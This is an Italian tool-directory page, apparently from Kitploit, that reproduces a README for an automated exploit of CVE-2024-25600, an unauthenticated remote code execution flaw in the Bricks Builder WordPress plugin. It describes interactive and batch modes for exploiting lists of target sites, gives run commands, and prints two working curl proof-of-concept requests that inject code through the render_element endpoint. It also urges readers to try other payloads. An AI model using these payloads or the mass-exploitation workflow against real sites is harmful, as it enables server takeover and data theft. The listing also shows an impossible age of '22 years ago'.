Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress — Strumento di exploit automatizzato per CVE-2024-25600, che consente esecuzione remota di codice non autenticata su siti WordPress usando il plugin Bricks Builder. Supporta modalità interattiva e batch per l'esecuzione di comandi. | Kitploit
Strumenti/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Strumento di exploit automatizzato per CVE-2024-25600, che consente esecuzione remota di codice non autenticata su siti WordPress usando il plugin Bricks Builder. Supporta modalità interattiva e batch per l'esecuzione di comandi.

Vedi Repository
22 anni faNon ancora revisionato
Condividi

Strumento Exploit per CVE-2024-25600 🚀

Descrizione 📝

Questo strumento 🛠️ è progettato per sfruttare la vulnerabilità CVE-2024-25600 🕳️ presente nel plugin Bricks Builder per WordPress. La vulnerabilità consente l'esecuzione remota di codice non autenticata sui siti web interessati 💻. Lo strumento automatizza il processo di sfruttamento recuperando i nonce e inviando richieste appositamente crafted per eseguire comandi arbitrari.

Funzionalità 🌟

  • Modalità Interattiva: Interagisci con il sito target in tempo reale 🕹️.
  • Modalità Batch: Scansiona e sfrutta più siti web da un elenco 📋.
  • Esecuzione di Comandi: Esegui comandi arbitrari sul server target ⚙️.

Installazione 🛠️

  1. Clona questo repository sulla tua macchina locale 🖥️ utilizzando git clone.
  2. Spostati nella directory del repository clonato.
  3. Installa le librerie Python richieste utilizzando pip install -r requirements.txt.

Utilizzo 📖

Modalità Interattiva 🎮

  1. Esegui lo strumento con python exploit.py -u <URL> per avviare la modalità interattiva.
  2. Segui le istruzioni a schermo per inviare comandi al server target.

Modalità Batch 📊

  1. Prepara un file di testo con un elenco di URL target.
  2. Esegui lo strumento con python exploit.py -l <file_path> per scansionare e sfruttare i siti elencati.

Prova di Concetto (PoC) 📝

La PoC di base fornita dalla divulgazione è la seguente:

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

Aggiornamento: Seconda PoC (più affidabile)

curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

È possibile che payload aggiuntivi possano produrre risultati migliori. Se il mio exploit o la mia prova di concetto non funzionano per te, ti incoraggio a sperimentare con payload alternativi per trovare una soluzione più efficace.

Sostituisci [HOST] con il sito web target e [NONCE] con il valore del nonce recuperato dal sito.

Riferimento 📖

Per maggiori informazioni sulla vulnerabilità CVE-2024-25600, fai riferimento alla divulgazione dettagliata su Snicco.io.

Disclaimer ⚠️

Le informazioni fornite in questo README sono solo a scopo educativo. L'hacking non autorizzato di siti web o reti è illegale e non etico. 🚫

Ringraziamenti 🙏

Un ringraziamento ai ricercatori di sicurezza che hanno scoperto e segnalato questa vulnerabilità, fornendo alla comunità informazioni e strumenti per aiutare a proteggere le proprie applicazioni web.

Scarica lo strumento